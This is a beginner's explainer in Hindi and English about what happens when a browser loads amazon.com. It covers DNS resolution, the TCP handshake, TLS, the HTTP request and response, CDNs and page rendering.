DNS Lookup (डोमेन नेम सिस्टम):
"amazon.com" एक human-friendly नाम है, लेकिन इंटरनेट को नंबर (IP addresses) समझ में आते हैं, जैसे 142.250.182.206
Chrome सबसे पहले OS से पूछता है: "भाई, amazon.com का IP पता है?"
अगर cache में नहीं मिला, तो यह DNS सर्वर (Google DNS जैसे 8.8.8.8) से पूछता है।
DNS system धीरे-धीरे ऊपर जाता है:
.com → TLD (Top Level Domain) server से बात होती है
फिर amazon के Authoritative DNS Server से
और जवाब मिलता है: "amazon.com का IP है: 205.251.242.103"
Step 2: TCP Connection बनाना
अब रोहन का लैपटॉप उस IP (205.251.242.103) से बात करने के लिए TCP connection बनाता है।
TCP तीन कदम में connection बनाता है (3-Way Handshake):
SYN: रोहन का सिस्टम बोलता है: “मैं कनेक्ट करना चाहता हूँ” (SYN)
SYN-ACK: Server बोलता है: “ठीक है, मैं तैयार हूँ” (SYN-ACK)
ACK: रोहन का सिस्टम जवाब देता है: “ठीक है, connection शुरू” (ACK)
अब दोनों में connection बन गया — ये होती है TCP 3-Way Handshake
(यह connection port 443 पर होता है क्योंकि amazon.com HTTPS इस्तेमाल करता है)
Step 3: TLS/SSL Handshake (Secure कनेक्शन)
अब बारी है TLS handshake की (पहले इसे SSL कहते थे)।
यह वेबसाइट को secure बनाता है (data encrypt करता है ताकि कोई बीच में चोरी न करे)
TLS handshake में क्या होता है:
Client (रोहन का लैपटॉप) Server से बोलता है: “मुझे secure connection चाहिए”
Server अपना Digital Certificate भेजता है (जिसे browser verify करता है कि ये असली amazon है)
एक Session Key बनती है, जिससे encryption शुरू होता है
अब सारा data encrypted है — कोई बीच में snoop नहीं कर सकता!
Step 4: HTTP Request भेजना
अब Chrome एक HTTP request भेजता है:
"Hey amazon.com, मुझे तुम्हारा homepage दो"
Step 5: Server से Response और Content
Server जवाब देता है:
HTML फ़ाइल (Page का structure)
CSS फ़ाइल (design और layout जैसे रंग, आकार)
JavaScript (JS) फ़ाइल (interactivity, जैसे slideshow, cart इत्यादि)
Images
Step 6: CDNs (Content Delivery Networks)
Amazon जैसी साइट अपने images, CSS, JS जैसी static files को CDN पर डालती हैं (Cloudflare, Akamai etc.)
CDN servers दुनिया भर में फैले होते हैं।
दिल्ली के रोहन को दिल्ली या आसपास के server से CSS/JS/images मिलते हैं — इससे website तेज़ खुलती है।
Step 7: Page Render होना
Chrome सब फ़ाइलें लाकर:
HTML पढ़ता है
CSS लगाता है (colors, layout बनाता है)
JS चलाता है (functions, animation, click वाले काम)
और रोहन को दिखाता है Amazon का Homepage
User → DNS → IP → TCP 3-Way Handshake (SYN, SYN-ACK, ACK) @ Port 443 → TLS Handshake → HTTPS Request → Server Response (HTML + CSS + JS via CDN) → Browser Render